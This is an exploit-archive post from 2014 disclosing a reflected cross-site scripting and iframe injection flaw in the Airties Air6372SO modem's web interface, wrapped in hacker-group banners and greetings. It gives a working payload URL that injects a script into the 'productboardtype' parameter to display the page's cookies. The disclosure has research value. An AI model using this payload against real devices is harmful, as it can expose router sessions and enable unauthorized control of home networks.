Home / exploits Airties Air6372SO Modem Web Interface Cross Site Scripting
Posted on 12 September 2014
Airties Air6372SO Modem Web Interface XSS/Iframe Injection Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://cyber-warrior.Org - http://h4x0resec.blogspot.com [~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x, Unuttuklarýmýz affola.. ############################################################ Turkey Security Group 'h4x0re SECURITY' ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Hardware/Web App : Airties |~Affected Version : Air6372SO |~Official Web: http://www.airties.com |~RISK : Light |~Tested On : Kali Linux Windows XP Windows Vista Airties Air6372SO Modem Web Interface ####################INFO################################ interface can be easily operated without root login. Exploitation; ============================================================================== http://$MODEMROOT/top.html?productboardtype= ? http://192.168.2.1/top.html?productboardtype=<b>H4x0reSec</b> <script>alert(document.cookie)</script> ============================================================================== .__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ | Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \_____ | __)_ / / / | \ \____ /_______ //_______ / \______ / / / /
